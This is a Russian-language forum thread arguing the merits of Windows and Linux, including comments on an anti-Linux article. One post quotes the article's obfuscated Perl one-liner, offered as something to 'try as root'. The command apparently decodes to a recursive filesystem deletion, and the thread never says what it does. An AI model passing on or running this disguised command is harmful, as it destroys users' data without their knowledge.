Windows vs Linux

Свернуть
X

• Время
  • Показать
Очистить всё
новые сообщения
  • nostaw
    Ветеран

• 09 February 2009
    • 8025

Сообщение от Sleep
    Дело в том, что весь смысл облачных сервисов - продвижение идеи "программа как услуга". Это по сути попытка остановить пиратство. Сколько программу не защищай, ее ломают и выкладывают в сеть, это невозможно предотвратить... В случае же облачных сервисов человек не будет получать программу "на руки". И не сможет ее ломать. Поэтому на все ключевые сервисы будет платный доступ...
    И для текущего пользователя ничего эти сервисы не изменят: будет бесплатная ерунда и будет дорогое, но качественное...
    Я в качестве такого примера привел Офис 365. Но его глупо внедрять на производстве, где 2-3 машины и Интернет от УСБ модема - по причине невозможности иметь другой.
    Другой пример, я приводил его, удаленный склад : Складской учет материалов, товаров | Программа для автоматизации склада Успешно внедрил и работает на небольшом предприятии уже год. Выбираете тарифный план по потребностям.. Начальство нарадоваться не может - все цифры круглые сутки под рукой и не зависимо где они находятся - дома, в Египте или в сауне
    Процесс идет.

Да, для большинства и простых пользователей это все удобнее и безпроблемнее. Линух из коробки это всегда ерунда полная. Все недоделано и недопилено.
    Так что факт как раз в другом: это линукс "для узкого круга специалистов" - системных администраторов, сервера на слабеньком железе, веб-разработка с традиционными пхп, майскл...
    В остальном линух можно приспособить под то, чтобы он как-то справлялся с домашними задачами, если есть лишнее время есть и знания, но оно того не стоит, имхо.
    Аминь!

- - - Добавлено - - -

Из за драйверов.
    И нормальный КДЕ (а другого рабочего стола я например не признаю - это единственная более-менее серьезная вещь, которую можно сравнивать с рабочим столом винды (и со мной согласен и Торвальдс )) - довольно требовательный к ресурсам, чтобы комфортно в нем работать. ХР-шная "Луна" легче. Так что на плохом железе я бы скорей ХР ставил, чем тот же линукс.
    Для меня вывод очевиден...
    При помощи Линукс удобно выходить в Интернет, получать и отправлять почту, закачивать и рассылать программы и другие файлы, разговаривать по Скайпу, пользоваться Аськой и прочими коммуникационными возможностями. Под Линукс очень хорошо пишется: его текстовые редакторы богаты полезными приспособлениями, при этом они быстрые и легкие.
    Источник: Зачем он нужен, этот Linux? | Техника и Интернет | ШколаЖизни.ру
    © Shkolazhizni.ru
    - - - Добавлено - - -

И скорей всего столкнулись бы с тем, что программ, которые именно Вам нужны там нет или работают не так, как бы Вы хотели. А выбрать не из чего...
    Мак изначально был заточен на работу с графикой и видео.. Поэтому лично для себя проблем не вижу... Кроме цены.

Комментарий

• igor_ua
      Ветеран
      Совет Форума

• 12 November 2006
      • 16263

Сообщение от gamer66
      ровно ничего...написана тупым виндузятником для таких же тупых виндузятников же...
      Нет это точно секта, и, Ностав, вами были задеты религиозные чувства
      Сообщение от gamer66
      снова вы про софт...наличие софта не делает систему хорошей или плохой...мы это давно уже выяснили...
      А зачем людям система без софта? Вам может подойдет, но не все такие непритязательные.

Комментарий

• nostaw
        Ветеран

• 09 February 2009
        • 8025

Сообщение от igor_ua
        Нет это точно секта, и, Ностав, вами были задеты религиозные чувства
        я больше не буду
        А зачем людям система без софта? Вам может подойдет, но не все такие непритязательные.
        Наверное, чтобы управлять... системой

Комментарий

• corvat
          Ветеран

• 25 February 2012
          • 2199

Сообщение от nostaw
          Наткнулся на достаточно интересную статью, которая вряд ли придется по вкусу любителям Линукса:

28 причин почему Linux не имеет будущего
          Статья смешная. Половина утверждений линуксоидов или выдумка, или заявления фанатов линукса, что в принципе одно и тоже.

1. Linux лучше подходит для продвинутых пользователей - Windows для начинающих.
          Очередное бредовое заявление.
          Согласен с автором. Правда он его не опроверг. Он не показал что любой сможет в Linux работать.
          3. Linux учит думать - от Windows пользователь тупеет.
          Фигня конечно. Но то что обычные пользователи Linux больше знают об устройстве системы это факт.
          С этого началось агрессивное навязывание Linux широким массам.
          Я не знаю где живёт автор, но у нас большинство о Linux даже не слышали.
          5. Доля Linux растет с каждым годом.
          Как следствие: даже самые смелые ожидания линуксоидов далеки от реальности.
          После того что Ubuntu будет на планшетах и смартфонах, а Valve сделали для Linux Steam и назвали Linux более перспективной платформой для игр чем Windows уже не актуально. Думаю не для кого не секрет, что игры одна из главных причин популярности Windows.
          6. Под Linux много программ.
          Да только 90% из них нафиг не нужны простому пользователю. Иными словам,, Linux может обеспечить только около 10% функциональности, необходимой в реальной жизни.
          Автор с логикой вообще не дружит. Или это про него сказано? от Windows пользователь тупеет.
          Для Windows существует миллионы программ из которых простому пользователи нужны только несколько, по логике автора получается что Windows обеспечивает только 0,000001% функциональности или даже меньше. Если мне нужен только аудио плеер, то вне зависимости от количества программ у меня 100% функциональность.
          Что касается реестра. Реестр является единой базой данных для хранения сведений о конфигурации компьютера и настроек операционной системы имеющей с иерархической структурой. К пользователю, кстати, реестр никакого отношения не имеет, и работа с ним может потребоваться только разработчику.

Реестр ни какого отношения не имеет к пользователи?! Автор вообще пользовался Windows?
          11. Под Linux нет вирусов.
          В последние годы вообще появился ряд "антивирусов для Linux". И как это не удивительно, они оказались востребованными!

Ничего удивительного, ведь из Linux лучше и удобнее Windows от вирусов чистить.
          В этом мире не бывает ничего бесплатного. Если вы думаете, что кто-то для вас будет работать забесплатно, то вы ошибаетесь

Автор приравнивает бесплатный продукт к бесплатной разработке. Тогда и за пользование Википедией мы платим получается. У меня Linux, кому я заплатил?
          Для простых пользователей - вам никто не мешает и под Windows использовать Свободное Программное Обеспечение, которого тут, кстати говоря, значительно больше, чем в Linux. Что, скажите мне, вам мешает это сделать?

Наверно религия мешает пользоваться.

18 пункт доставил. В доказательства превосходства винды установил unix систему. У автора не уточняется какая версия. Автор пишет что Syllable Desktop основано не на unix. Но факт что не Windows установил в доказательство её превосходства.
          P.S.
          Кстати запустил предложенный автором скрипт.
          Вдобавок, в использовании консоли заключается серьезная опасность. Попробуйте запустить следующий скрипт с правами root.
          perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-}<&`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
          Плохо что автор не написал, что будет после запуска. У меня ничего не произошло. Запускал правда в виртуалке.

P.P.S.
          Скачал из любопытства Syllable Desktop и установил в виртуалку. Загрузчик GRUB. Пароль пользователя root.
          Скрин.Нажмите на изображение для увеличения.

Название:	Снимок экрана о&amp;#1.jpg
Просмотров:	1
Размер:	106.6 Кб
ID:	10130594 Да тут Unix даже не пахнет.

Сообщение от nostaw
          А вот с некоторыми выкладками автора не поспоришь - как-то: бесплатность, вирусобезопасность и пр.
          За что и кому вы платили установив Linux? Какие вирусы подхватили?
          Последний раз редактировалось corvat; 08 March 2013, 08:56 PM.
          Умы бывают трех родов: один все постигает сам; другой может понять то, что постиг первый; третий - сам ничего не постигает и постигнутого другим понять не может.

Люди, веря, что новый правитель окажется лучше, охотно восстают против старого, но вскоре они на опыте убеждаются, что обманулись, ибо новый правитель всегда оказывается хуже старого.

Комментарий

• Alexis_Z
            Участник

• 04 March 2013
            • 7

1. Фигня конечно. Но то что обычные пользователи Linux больше знают об устройстве системы это факт.
            Загляните на убунтушные форумы - разочаруйтесь..

2. Реестр ни какого отношения не имеет к пользователи?! Автор вообще пользовался Windows?
            Я ею пользуюсь 15 лет. Пользователь не лезет в реестр - он переустанавливает систему. В реестр лазит только сисадмин.

3. Ничего удивительного, ведь из Linux лучше и удобнее Windows от вирусов чистить.
            Да ну? И чем же удобнее? Вы про Win PE слыхали?

4. Автор приравнивает бесплатный продукт к бесплатной разработке. Тогда и за пользование Википедией мы платим получается. У меня Linux, кому я заплатил?
            Не КОМУ, а ЧЕМ заплатил. Своим личным временем.

Комментарий

• Полковник
              Ветеран

• 14 September 2005
              • 18241

Сообщение от Alexis_Z
              Я ею пользуюсь 15 лет. Пользователь не лезет в реестр - он переустанавливает систему. В реестр лазит только сисадмин.
              Мдяя.... очевидно, реально, пользователи винды, несколько глупее.

Любое ваше действие в панели управления ведёт к изменению реестра. Даже простейшее действие по втыканию флэшки - это точно такое-же изменение реестра. Когда вы переключаете вид отображения файлов в проводнике - это изменение реестра. Когда вы меняете разрешение и глубину цвета дисплея - это изменение реестра...

И вы можете элементарно запороть винду до состояния полного незапускания, даже не понимая, что вы реально лазали в реестр.

Что касается сисадминов, то вот они-то как раз и стараются в реестр лазить поменьше... То есть всё строго наоборот.
              Кстати, сисадмины, предпочитают лазать в реестр по "линуксоидному типу" - то есть ручками, ручками... из консоли...

.
              "Давайте учиться иметь свое мнение, давайте не будем повторять чужое."
              Виктор Суворов

Комментарий

• Alexis_Z
                Участник

• 04 March 2013
                • 7

>Мдяя.... очевидно, реально, пользователи винды, несколько глупее.
                С чего вы это взяли? Сравниваете с собою? Я "виндузятник" со стажем и горжусь этим, начинал с Win3.11 "нерабочий труп" + Norton Desktop 2. Глупее вас себя не считаю. Объективно, после пробных установок Мандривы, Суси, Убунты, Альта, Проклятого маленького линукса (DSL), Дебиана Ленни - твёрдо решил с Виндой не расставаться. Причём не в идеальной виртуальной среде, а на реальной машине. Не впечатляет ваш линукс - сплошные проблемы, несовместимости, поддержка аппаратуры на уровне "абы работало, хоть как-ниудь", ну а Компиз и иные "свистоперделки" это к детям- это не ко мне.
                >Любое ваше действие в панели управления ведёт к изменению реестра. Даже простейшее действие по втыканию флэшки - это точно такое-же изменение реестра. Когда вы переключаете вид отображения файлов в проводнике - это изменение реестра. Когда вы меняете разрешение и глубину цвета дисплея - это изменение реестра...
                И вы можете элементарно запороть винду до состояния полного незапускания, даже не понимая, что вы реально лазали в реестр.
                Пользователь не сможет ничего "убить", не используя regedit. Даже программы "чистилки" реестра уже давно не имеют привычки "рушить реестр" - на дворе XXI век.

>Что касается сисадминов, то вот они-то как раз и стараются в реестр лазить поменьше... То есть всё строго наоборот.
                Кстати, сисадмины, предпочитают лазать в реестр по "линуксоидному типу" - то есть ручками, ручками... из консоли...
                Что касается сисадминов, то именно для них существует встроенный regedit, ибо простой пользователь в нём просто не разберётся.

Комментарий

• corvat
                  Ветеран

• 25 February 2012
                  • 2199

Сообщение от Alexis_Z
                  Загляните на убунтушные форумы - разочаруйтесь..
                  Почему я должен разочароваться от доказательств своего утвержения? Ведь массу вопросов задают как раз пользователи windows, показывая что кроме как нажать кнопочки далее, далее, ок большинство ничего не может. Хотя многие и этого не могут сделать, буквально на днях один знакомый просил установить антивирус.
                  В середине двухтысячных для запуска игры или проги нужно было в реестре залезать. Значит я сисадмин? И откуда у обычного пользавателя сисадмин то возмётся? В комплект с системой не входили.
                  Да ну? И чем же удобнее? Вы про Win PE слыхали?
                  Слышал. И? Пользователю линукса удобней будет Win PE чем полноценная лайв система?
                  Не КОМУ, а ЧЕМ заплатил. Своим личным временем.
                  Значит пользаватели windows настраивают систему тратят не своё время? При том ещё и за деньги.

Так самоотверженно показывайте что от windows пользователи тупеют. Сначала автор статьи это показал своими рассуждениями и установкой unix системы в доказательство превосходства windows, а теперь и вы. Спасибо!
                  Уверен что вы скорее всего верующий. Правильно?
                  Умы бывают трех родов: один все постигает сам; другой может понять то, что постиг первый; третий - сам ничего не постигает и постигнутого другим понять не может.

Люди, веря, что новый правитель окажется лучше, охотно восстают против старого, но вскоре они на опыте убеждаются, что обманулись, ибо новый правитель всегда оказывается хуже старого.

Комментарий

• Полковник
                    Ветеран

• 14 September 2005
                    • 18241

Сообщение от Alexis_Z
                    С чего вы это взяли? Сравниваете с собою?
                    Нет, озвучиваю статистику.

Сообщение от Alexis_Z
                    "виндузятник" со стажем и горжусь этим, начинал с Win3.11 "нерабочий труп" + Norton Desktop 2. Глупее вас себя не считаю.
                    И чо? Я начинал вообще с RT-11, PL(на ЕС), DOS(не мелкософтовский)... И чо?
                    Умнее вас себя тоже не считаю, потому как ещё не знаю, каков ваш уровень знаний и навыков.

Сообщение от Alexis_Z
                    Объективно,
                    ...
                    сплошные проблемы, несовместимости,
                    Но теперь начинаю узнавать...( ваш уровень знаний и навыков.)

Сообщение от Alexis_Z
                    Пользователь не сможет ничего "убить", не используя regedit.
                    Показать?
                    В принципе, конечно, чем старше версия винды, тем тяжелее её грохнуть... но вот у меня дочура(2 года) на днях грохнула ХРюшку на моей домашней машине... Причём, я даже не могу спросить у неё как она это сделала.

Сообщение от Alexis_Z
                    Что касается сисадминов, то именно для них существует встроенный regedit, ибо простой пользователь в нём просто не разберётся.
                    Вы считаете пользователей(винды?) идиотами?

.
                    Виктор Суворов

Комментарий

• MixoID
                      R.I.P

• 09 July 2007
                      • 5889

Сообщение от Полковник
                      но вот у меня дочура(2 года) на днях грохнула ХРюшку на моей домашней машине... Причём, я даже не могу спросить у неё как она это сделала.
                      Немножко оффтоп:
                      Поспорил с другом на литр, что сломаю его систему за 20 мин. Условия были: Флешки и диски не фтыкать.
                      Сидел сидел... и тут опа! Озарение! Захожу в биос и оба его винта загоняю в RAID. Фсе! Капец! Крику было!
                      Это к тому, что сломать можно все, главное мыслить извращеннее.

Комментарий

• Полковник
                        Ветеран

• 14 September 2005
                        • 18241

Сообщение от MixoID
                        Немножко оффтоп:
                        Поспорил с другом на литр, что сломаю его систему за 20 мин. Условия были: Флешки и диски не фтыкать.
                        Сидел сидел... и тут опа! Озарение! Захожу в биос и оба его винта загоняю в RAID. Фсе! Капец! Крику было!
                        Это к тому, что сломать можно все, главное мыслить извращеннее.
                        Микс, гы-гы-гы... мухлёж. Речь шла об операционной системе или о самом компьютере т.н. "железе"? Я бы перед спором, реально уточнил в условиях.

.
                        Виктор Суворов

Комментарий

• corvat
                          Ветеран

• 25 February 2012
                          • 2199

Сообщение от Полковник

.
                          Полковник, приветствую!

Каков может быть уровень знаний человека который не смог настроить линукс?
                          Объективно, после пробных установок Мандривы, Суси, Убунты, Альта, Проклятого маленького линукса (DSL), Дебиана Ленни - твёрдо решил с Виндой не расставаться.
                          Ну и это:
                          Пользователь не сможет ничего "убить", не используя regedit.

Комментарий

• Sleep
                            виртуальный лисенок

• 24 April 2009
                            • 7348

Сообщение от corvat
                            Если мне нужен только аудио плеер, то вне зависимости от количества программ у меня 100% функциональность.
                            Недавно очень удивился. встретил женщину, которой поставили линукс на ноубук. Женщина в компьютере вообще ни в зуб ногой. Линух у нее уже три года. Пользуется активно браузером, как я понял. И похоже не понимает, что ей поставили "не ту систему". Обратилась за помощью, потому что ей кто-то сказал, что для Линукс тоже есть вирусы, а ей антивирус не поставили... Подумал, сказал, чтобы не волновалась, все равно под Линукс нормальных антивирусов не существует. Уж не знаю, прав ли был
                            Первый знакомый пользователь, который новичок, и никаких проблем (кроме одной надуманной) не встретил пользуясь линуксом...
                            Наверное очень многое зависит от "широты интересов".

- - - Добавлено - - -

Сообщение от corvat
                            Уверен что вы скорее всего верующий. Правильно?
                            А ту бредовую статью, которую Вы комментировали, скорее всего атеист писал.
                            к духовной гибели ведет дикая логика, а не дикое воображение. Человек не сходит с ума, создавая статую высотой в милю, но может сойти с ума, если вздумает измерить ее рост в дюймах.

Комментарий

• Павел_17
                              христианин

• 13 September 2002
                              • 24020

Сообщение от corvat
                              Значит пользаватели windows настраивают систему тратят не своё время? При том ещё и за деньги.
                              Все определяют задачи. Когда нужна многозадачность (вытесняющая), то Windows не ставят. Может сейчас что изменилось с выходом новых серверных ОС, уже не слежу. Но раньше было так.

Комментарий

• MixoID
                                R.I.P

• 09 July 2007
                                • 5889

Сообщение от Полковник
                                Микс, гы-гы-гы... мухлёж. Речь шла об операционной системе или о самом компьютере т.н. "железе"? Я бы перед спором, реально уточнил в условиях.
                                Ничего не знаю, моя хата с краю. "Железо" ведь целое, а ось - в кашу. Попутно и пару сотен гигов мультимедии всякой в труху.

Комментарий

Обработка...